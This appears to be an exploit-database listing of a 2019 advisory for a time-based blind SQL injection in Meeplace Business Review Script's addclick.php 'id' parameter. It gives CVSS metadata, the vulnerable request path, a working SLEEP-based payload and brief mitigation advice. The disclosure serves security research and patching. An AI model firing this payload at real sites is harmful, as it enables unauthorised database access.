header-logo
Suggest Exploit
vendor:
Meeplace Business Review Script
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Meeplace Business Review Script
Affected Version From: Lastest
Affected Version To: Lastest
Patch Exists: NO
Related CWE: N/A
CPE: a:meeplace:meeplace_business_review_script
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2019

Meeplace Business Review Script – ‘id’ SQL Injection

Meeplace Business Review Script is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious payload to the vulnerable parameter 'id' in the 'addclick.php' script. The payload '&id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)' can be used to exploit this vulnerability.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. Sanitizing user input and using parameterized queries can help mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection
# Date: 22.03.2019
# Dork:
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.meeplace.com
# Demo Site: http://demo.meeplace.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

# Request: http://localhost/[PATH]/ad/addclick.php?&id=1
# Vulnerable Parameter: id (GET)
# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)

Navigation

Suggest Exploit

Services By CQR